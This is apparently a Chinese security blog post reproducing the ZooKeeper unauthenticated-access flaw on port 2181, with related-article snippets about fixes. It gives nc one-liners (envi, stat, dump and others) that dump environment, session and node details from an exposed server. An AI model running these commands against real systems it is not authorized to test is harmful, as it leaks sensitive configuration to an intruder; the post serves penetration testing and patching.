zookeeper未授权漏洞实战+复现

已于 2022-08-24 08:47:32 修改
阅读量7.8k 收藏 6
点赞数
分类专栏: 渗透测试 实战 文章标签: zookeeper 分布式 网络安全 web安全
于 2022-05-12 15:59:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55716222/article/details/124732332
版权

声明:该文章来自笔者日常学习笔记,未经授权,严禁转载,如需转载,评论留言。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章笔者和本博客无关。

测试授权目标时,通过工具扫描出了zookeeper未授权(CVE-2014-085)

之后就是进行漏洞利用

由于目标系统较敏感,没有执行其它操作,所以准备本地复现

Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,安装zookeeper后 默认端口为2181

这个为配置文件

直接进行漏洞利用

echo envi |nc xxxxx   2181

直接输出目标服务器环境信息,非常详细

os名称 版本  服务器名称 版本  绝对路径  等等非常多

echo stat |nc xxxxx   2181

 连接数 版本 模式等等

echo ruok |nc xxxx   2181

 查看服务器状态

echo reqs |nc xxxx  2181

 未完成的请求,我这里是无请求

echo dump |nc xxxx  2181

 会话以及节点信息

只知道这些漏洞利用,最后附上一张可以理解为log的图片

 详细记录了攻击者的动作

当时工具扫描出了该端口,在写报告时想着用nmap扫描一下,发现却扫描不出该端口,应该是做了某些屏蔽处理吧,让我不得不深思,大佬就是大佬,越小众的工具,可能越好用吧,努力成为大佬。。。

水平有限 多多包含,单纯记录,请不要做违法行为

小白牛啊
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2014-0085 zookeeper授权访问POCsuite自动化脚本
afei001
07-27 685
这是基于POCsuite的zookeeper授权访问POCsuite自动化脚本。
web渗透测试漏洞复现ZooKeeper授权漏洞复现
HACKONE的博客
03-30 667
ZooKeeper 是一个分布式的、开源的协调服务,最初由雅虎开发,现隶属于 Apache 软件基金会,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件,旨在为大型分布式系统提供一致性的服务。ZooKeeper 的设计目的是简化分布式应用程序的开发和维护,它通过提供一组简单易用的原语和数据模型,为分布式系统中的进程提供协作服务。
zookeeper授权访问修复建议
07-14
zookeeper授权访问修复建议
zookeeper授权访问漏洞处理
weixin_50016127的博客
06-27 1万+
zookeeper授权访问漏洞处理
存在 ZooKeeper 授权访问【原理扫描】--通过防火墙策略进行修复
最新发布
qyq88888的专栏
06-06 521
ELK集群存在 ZooKeeper 授权访问【原理扫描】
ZooKeeper 授权访问漏洞CVE-2014-085) 复现
热门推荐
gclome的博客
07-31 1万+
最近想收集一下近几年的通用型漏洞,然后就找到了这个漏洞,那就先来这个漏洞吧! 01 ZooKeeper授权访问漏洞是什么 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。 ZooKeeper默认开启在2181端口,在进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、
zookeeper授权漏洞复现及处理
kofterry的专栏
09-18 3687
不知道你有没有注意,zk服务端启动后,默认会启动这几个具有world和cdrwa权限的znode,“/” "/zookeeper" "/zookeeper/config"和"/zookeeper/quota"(根据zookeeper的版本不同可能存在不同,并且这几个节点虽然具有world和cdrwa权限,但是是无法删除的,不知道为什么,好在我们可以给它设置ACL列表。重要的是构建环境把我在配置文件配置的user信息给删掉了(我不知道)才开始跑的,更坑的是它运行完后直接清除日志了,哪里错了都看不到。
Apache Zookeeper 授权访问漏洞【原理扫描】
萌兔兔MMQ!!
11-25 1万+
漏洞名称 Apache Zookeeper 授权访问漏洞【原理扫描】风险等级 高高可利用 否CVE编号 -端口(服务) 2181(zookeeper)风险描述 ZooKeeper是一个高性能的分布式数据一致性解决方案,它将复杂的,容易出错的分布式一致性服务封装起来,构成一个高效可靠的原语集,并提供一系列简单易用的接口给客户使用。ZooKeeper默认开启在2181端口,在进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。
授权访问:ZooKeeper 授权访问漏洞
qq_68163788的博客
05-15 1745
zookeeper分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。 Zookeeper的默认开放端口是2181。 Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。
ZooKeeper授权访问漏洞确认与修复
sdujava2011
02-27 3509
Zookeeper授权访问漏洞确认与修复
Zookeeper授权访问漏洞复现
weixin_48465105的博客
12-29 3433
Zookeeper授权访问漏洞复现 危害:远程利用 Zookeeper,通过服务器收集敏感信息或者在 Zookeeper 集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。 使用Linux,kali,win都可以 zookeeper环境搭建:教程 漏洞验证 1、对靶机进行授权连接(需要搭建zookeeper) 2、使用命令获取目标的环境 echo envi|nc 192.168.123.124 2181 以上为靶场测试 ...
ZooKeeper 授权访问漏洞处理方法
08-31
ZooKeeper 授权访问漏洞处理方法和重设setAcl,需要设置超级管理密码后,方可修改
Zookeeper授权访问测试问题
09-29
ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。这篇文章主要介绍了Zookeeper授权访问测试,需要的朋友可以参考下
Springboot+dubbo+zookeeper+swagger+mybatisplus+mysql
06-30
这个项目组合"Springboot+dubbo+zookeeper+swagger+mybatisplus+mysql"正是为了实现这样的目标而设计的。让我们逐一深入探讨这些技术组件及其在系统中的作用。 首先,Spring Boot是Spring框架的一个精简版,它旨在...
zookeeper授权访问(CVE-2014-0085漏洞修复建议
THZLYXX的博客
01-24 3397
xxxx为需要设置的四字命令,添加多命令请使用逗号进行隔开,请根据系统所需进行命令设置,请勿添加envi命令,如系统有使用此命令的需求请使用其他修复方法。1.进入zookeeper目录找到zoo.cfg文件,常见路径为/opt/zookeeper-3.4.13/conf/zoo.cfg。2.使用下面命令登录zookeeper命令中ip为容器ip如果直接安装在服务器上请使用服务器ip。2.使用vi编辑器打开zoo.cfg文件,在文件中添加四字命令白名单,添加命令如下。:访问(Access)
Zookeeper授权访问漏洞
Kevin's Blog
05-11 1万+
文章目录一、简单介绍二、漏洞原因三、影响版本四、检测方法五、防御措施 一、简单介绍  &ems;Zookeeper是一个分布式开放源码的分布式应用程序(分布在不同计算机上,客户端/服务端模式)协调服务,是Hadoop和HBase的重要组件。 目标:封装好复杂易出错的关键业务; 用处:统一命名服务、域名服务、分布式同步、状态同步服务、集群管理等 二、漏洞原因  &ems;默认安装配置完的zookeeper允许授权访问,管理员配置访问控制列表(ACL)。导致攻击者可以在默认开放的2181
Zookeeper授权访问漏洞修复
码农养家
09-18 712
Zookeeper授权访问漏洞修复
[2021]Zookeeper getAcl命令授权访问漏洞概述与解决
NBA首席形象大使坤坤
04-07 2818
今天在漏洞扫描的时候蹦出来一个zookeeper漏洞问题,即使是非zookeeper的节点,或者是非集群内部节点,也可以通过nc扫描2181端口,获取极多的zk信息。关于漏洞的详细描述参考apache zookeeper官方概述:CVE-2018-8012: Apache ZooKeeper Quorum Peer mutual authentication 漏洞演示: 这是一个CDP集群,里面有三个物理节点,每个节点各自有一个zk实例,注意看IP。 另开一台非集群节点的连接,使用echo conf
ZooKeeper 授权访问漏洞,如何复现
02-22
你需要攻击者有充足的网络访问权限才能复现 ZooKeeper 授权访问漏洞。攻击者可以使用与 ZooKeeper 兼容的客户端软件尝试连接到 ZooKeeper 节点,以检查是否存在授权访问的漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值